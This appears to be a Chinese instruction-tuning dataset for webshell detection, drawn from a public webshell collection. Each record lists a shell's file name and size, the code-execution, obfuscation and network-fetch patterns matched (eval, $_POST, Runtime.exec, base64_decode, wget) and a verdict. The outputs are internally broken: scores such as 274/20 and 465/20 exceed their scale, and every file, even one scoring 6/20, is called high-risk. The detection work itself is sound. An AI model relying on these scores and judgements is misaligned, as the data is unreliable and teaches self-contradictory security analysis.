chr\\s*\\( 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 155/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/Backdoor Dev Shells/Source/devilzShell.aspx", "malicious_score": 155, "md5_hash": "7981f1bf9b8e5f4691e4ac440f1ba251"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"devilzShell.asp\", \"文件类型\": \"asp\", \"文件大小\": \"60136 bytes\", \"行数\": 1483}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: WScript.Shell, execute(, Request.QueryString, CreateObject(, Request.Form 发现混淆技术: base64_decode, chr\\s*\\( 包含网络功能: wget 具备文件操作能力: mkdir\\s*\\(, unlink\\s*\\( 恶意度评分: 274/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/Backdoor Dev Shells/Source/devilzShell.asp", "malicious_score": 274, "md5_hash": "e04549b7e57e5048465c6d3a36bec903"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"devilzShell.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"64630 bytes\", \"行数\": 1319}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 233/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/Backdoor Dev Shells/Source/devilzShell.jsp", "malicious_score": 233, "md5_hash": "816d7a00ae40ae6d84f9223af2c02f17"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"devilzShell.php\", \"文件类型\": \"php\", \"文件大小\": \"48668 bytes\", \"行数\": 1213}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_COOKIE[, $_POST[ 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 256/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/Backdoor Dev Shells/Source/devilzShell.php", "malicious_score": 256, "md5_hash": "02e8597a4ddade7b69f6fa546ebfe170"}} {"instruction": "分析这个perl文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"devilzShell.cgi\", \"文件类型\": \"perl\", \"文件大小\": \"50929 bytes\", \"行数\": 1429}", "output": "这是一个perl类型的webshell文件。 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, unlink\\s*\\( 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_perl_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/Backdoor Dev Shells/Source/devilzShell.cgi", "malicious_score": 8, "md5_hash": "5ad6a3da93330359cb1292e9d289b7cc"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"php_assert.php\", \"文件类型\": \"php\", \"文件大小\": \"59 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/antSword-shells/php_assert.php", "malicious_score": 8, "md5_hash": "d6e431e7a96c2f73d091cc2575d3903c"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"php_create_function.php\", \"文件类型\": \"php\", \"文件大小\": \"87 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: create_function(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/antSword-shells/php_create_function.php", "malicious_score": 8, "md5_hash": "6f94d06435364d06b96b9c085ec4c8d2"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"php_custom_script_for_mysql_fix.php\", \"文件类型\": \"php\", \"文件大小\": \"12391 bytes\", \"行数\": 461}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_REQUEST[, system(, base64_decode( 发现混淆技术: base64_decode, chr\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 46/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/antSword-shells/php_custom_script_for_mysql_fix.php", "malicious_score": 46, "md5_hash": "cac47d5e37b4449380bcf1a1dbe1b30f"}} {"instruction": "分析这个python文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"python2_custom_script.py\", \"文件类型\": \"python\", \"文件大小\": \"12223 bytes\", \"行数\": 349}", "output": "这是一个python类型的webshell文件。 发现混淆技术: ord\\s*\\(, chr\\s*\\( 包含网络功能: wget, urllib 具备文件操作能力: copy\\s*\\( 恶意度评分: 7/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_python_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/antSword-shells/python2_custom_script.py", "malicious_score": 7, "md5_hash": "ec8ebdc6f6e011c4bf20615e084d2f7a"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jsp_custom_script_for_oracle.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"21853 bytes\", \"行数\": 525}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: wget, HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 27/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/antSword-shells/jsp_custom_script_for_oracle.jsp", "malicious_score": 27, "md5_hash": "26781097db7d22e98d4e932da4084f89"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"php_custom_spy_for_mysql.php\", \"文件类型\": \"php\", \"文件大小\": \"10788 bytes\", \"行数\": 406}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_REQUEST[, system(, base64_decode( 发现混淆技术: base64_decode, chr\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 40/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/antSword-shells/php_custom_spy_for_mysql.php", "malicious_score": 40, "md5_hash": "543624bec87272974384c8ab77f2357a"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jsp_custom_spy_for_mysql.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"14306 bytes\", \"行数\": 381}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: wget, HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 27/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/antSword-shells/jsp_custom_spy_for_mysql.jsp", "malicious_score": 27, "md5_hash": "7aca552c011c18f90bc947580328adea"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jspx_custom_script_for_mysql.jspx\", \"文件类型\": \"jsp\", \"文件大小\": \"24096 bytes\", \"行数\": 570}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: wget, HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 27/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/antSword-shells/jspx_custom_script_for_mysql.jspx", "malicious_score": 27, "md5_hash": "1f2a56fd54f302857846e8901232c03a"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wscmd.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2194 bytes\", \"行数\": 52}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/wsMemShell/wscmd.jsp", "malicious_score": 15, "md5_hash": "e653a997240afa7527c733e250cd509d"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wscmd.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2508 bytes\", \"行数\": 54}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/wsMemShell/weblogic/wscmd.jsp", "malicious_score": 15, "md5_hash": "6608720d7461f6b55ea0a3eb58840dd8"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wsAddAllContainer.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"3924 bytes\", \"行数\": 85}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/wsMemShell/weblogic/wsAddAllContainer.jsp", "malicious_score": 15, "md5_hash": "cd9600f736b9b5fa1f0d3c2e2207c93d"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"123.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2589 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, request.getParameter, Class.forName 恶意度评分: 24/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/Godzilla/123.jsp", "malicious_score": 24, "md5_hash": "65f1546b085fba9cb762345ca2cbc3c8"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"123.php\", \"文件类型\": \"php\", \"文件大小\": \"836 bytes\", \"行数\": 34}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 14/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/Godzilla/123.php", "malicious_score": 14, "md5_hash": "e62dcd8c16af480f949f347cb43b8cb6"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"20220213.php\", \"文件类型\": \"php\", \"文件大小\": \"840 bytes\", \"行数\": 34}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 14/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/Godzilla/20220213.php", "malicious_score": 14, "md5_hash": "c5b876d645fbdc6b790359c964604d90"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"20220213_03.php\", \"文件类型\": \"php\", \"文件大小\": \"842 bytes\", \"行数\": 31}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 14/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/Godzilla/20220213_03.php", "malicious_score": 14, "md5_hash": "59e58d954eb646da16826ed04d79602f"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"123.jspx\", \"文件类型\": \"jsp\", \"文件大小\": \"2722 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, request.getParameter, Class.forName 恶意度评分: 24/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/Godzilla/123.jspx", "malicious_score": 24, "md5_hash": "9c0274326076fc8fa5b676d42ae29cd2"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"20220213_02.php\", \"文件类型\": \"php\", \"文件大小\": \"631 bytes\", \"行数\": 26}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, file_get_contents( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/Godzilla/20220213_02.php", "malicious_score": 6, "md5_hash": "2a5bbbab17f2811133d98e396ddbd7bd"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"123.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"1319 bytes\", \"行数\": 1}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/Godzilla/123.aspx", "malicious_score": 9, "md5_hash": "f217e359425860e90d858b14e22253bf"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"paxmac.jspx\", \"文件类型\": \"jsp\", \"文件大小\": \"897 bytes\", \"行数\": 35}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jspx/paxmac.jspx", "malicious_score": 9, "md5_hash": "ceb4f720f49a136fa660f87f7c2947cb"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jw.jspx\", \"文件类型\": \"jsp\", \"文件大小\": \"564 bytes\", \"行数\": 15}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jspx/jw.jspx", "malicious_score": 12, "md5_hash": "667f561b7b6618fb5b3f287450df41dc"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmd.jspx\", \"文件类型\": \"jsp\", \"文件大小\": \"922 bytes\", \"行数\": 24}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: exec(, Runtime.getRuntime() 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jspx/cmd.jspx", "malicious_score": 6, "md5_hash": "e8394312f094d66f53cdfdf52a4518e4"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jspspy.jspx\", \"文件类型\": \"jsp\", \"文件大小\": \"120947 bytes\", \"行数\": 3310}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 465/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jspx/jspspy.jspx", "malicious_score": 465, "md5_hash": "4b6f3a4482d92333a6fcaa2e618fe281"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jspx.jspx\", \"文件类型\": \"jsp\", \"文件大小\": \"7586 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 26/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jspx/jspx.jspx", "malicious_score": 26, "md5_hash": "2f6144b84eec0cade35ea6dd330207e6"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jjw.jspx\", \"文件类型\": \"jsp\", \"文件大小\": \"239 bytes\", \"行数\": 6}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jspx/jjw.jspx", "malicious_score": 9, "md5_hash": "a8b8a789644340637269a7d9de715afd"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"x.php\", \"文件类型\": \"php\", \"文件大小\": \"134 bytes\", \"行数\": 3}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, eval( 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/x.php", "malicious_score": 15, "md5_hash": "7e5e2fc5fad83f88fd2ab5cb41a1ea5d"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"toby57解析加密一句话木马.php\", \"文件类型\": \"php\", \"文件大小\": \"849 bytes\", \"行数\": 30}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, eval(, fwrite( 包含网络功能: fsockopen 具备文件操作能力: file_put_contents, fwrite\\s*\\( 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/toby57解析加密一句话木马.php", "malicious_score": 12, "md5_hash": "b83d76e4d24249f1adda5502a2799b21"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"guo.php\", \"文件类型\": \"php\", \"文件大小\": \"94 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, str_rot13(, preg_replace('/ad/e 发现混淆技术: str_rot13 恶意度评分: 11/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/guo.php", "malicious_score": 11, "md5_hash": "9e69a8f499c660ee0b4796af14dc08f0"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ice.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"6218 bytes\", \"行数\": 59}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/ice.jsp", "malicious_score": 23, "md5_hash": "49040c9476a26e5f861b661242f99d55"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"w03.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"161 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/w03.jsp", "malicious_score": 6, "md5_hash": "145324c6d04d75662eb93789b3cdcdd2"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"qun01.php\", \"文件类型\": \"php\", \"文件大小\": \"1172 bytes\", \"行数\": 40}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, $_REQUEST[, eval( 发现混淆技术: chr\\s*\\( 恶意度评分: 74/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/qun01.php", "malicious_score": 74, "md5_hash": "d771409e152d0fabae45ea192076d45e"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"m7lrv01.php\", \"文件类型\": \"php\", \"文件大小\": \"67 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, eval( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/m7lrv01.php", "malicious_score": 6, "md5_hash": "3ccf9cb0f5be502de520558640662724"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"p.php\", \"文件类型\": \"php\", \"文件大小\": \"74 bytes\", \"行数\": 6}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: assert(, $_POST[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/p.php", "malicious_score": 6, "md5_hash": "769a354464d8e9d69038eca3d8c2f96c"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bypass01.php\", \"文件类型\": \"php\", \"文件大小\": \"142 bytes\", \"行数\": 13}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/bypass01.php", "malicious_score": 6, "md5_hash": "3b361e469cfca8559bd26b42406f8df9"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"download 下载文件.asp\", \"文件类型\": \"asp\", \"文件大小\": \"305 bytes\", \"行数\": 11}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createObject( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/download 下载文件.asp", "malicious_score": 6, "md5_hash": "c92644095f12686d87b93d3d0e21d28c"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"w01.asp\", \"文件类型\": \"asp\", \"文件大小\": \"136 bytes\", \"行数\": 6}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, eval( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/w01.asp", "malicious_score": 6, "md5_hash": "2d2435cde154d62387e593947d72a2ca"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"w_2016-05-25.php\", \"文件类型\": \"php\", \"文件大小\": \"153 bytes\", \"行数\": 6}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, preg_replace(\"/\\[(.*)\\]/e, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 11/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/w_2016-05-25.php", "malicious_score": 11, "md5_hash": "103accb9425879d06b9d57d0e36e01af"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"w01.php\", \"文件类型\": \"php\", \"文件大小\": \"216 bytes\", \"行数\": 9}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: preg_replace('/.*/e, $_REQUEST[, eval( 发现混淆技术: base64_decode 恶意度评分: 11/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/w01.php", "malicious_score": 11, "md5_hash": "c9a14308c91eb6201a9b31bfaac0966d"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"w.php\", \"文件类型\": \"php\", \"文件大小\": \"377 bytes\", \"行数\": 18}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, eval( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/w.php", "malicious_score": 6, "md5_hash": "ce6a53536ea70c8586f73d44cfa942cd"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"w.jspx\", \"文件类型\": \"jsp\", \"文件大小\": \"285 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/w.jspx", "malicious_score": 6, "md5_hash": "6d4a5687e9772d2a9120cb7eafcd53bb"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"强悍.php\", \"文件类型\": \"php\", \"文件大小\": \"2419 bytes\", \"行数\": 64}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: assert(, str_rot13(, $_GET[, eval(, $_POST[ 发现混淆技术: str_rot13 恶意度评分: 77/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/强悍.php", "malicious_score": 77, "md5_hash": "be0033c2d7ad584c19f4a7c75b3977a4"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"w.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"6220 bytes\", \"行数\": 59}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/w.jsp", "malicious_score": 23, "md5_hash": "6a59c0c267887e2ae34aefcf4e11a848"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"w-ob_start01.php\", \"文件类型\": \"php\", \"文件大小\": \"144 bytes\", \"行数\": 7}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: assert(, $_REQUEST[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/caidao-shell/w-ob_start01.php", "malicious_score": 6, "md5_hash": "64ad1bc2f558b920ea037ad4cc0a3b05"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"redirect.asp\", \"文件类型\": \"asp\", \"文件大小\": \"14640 bytes\", 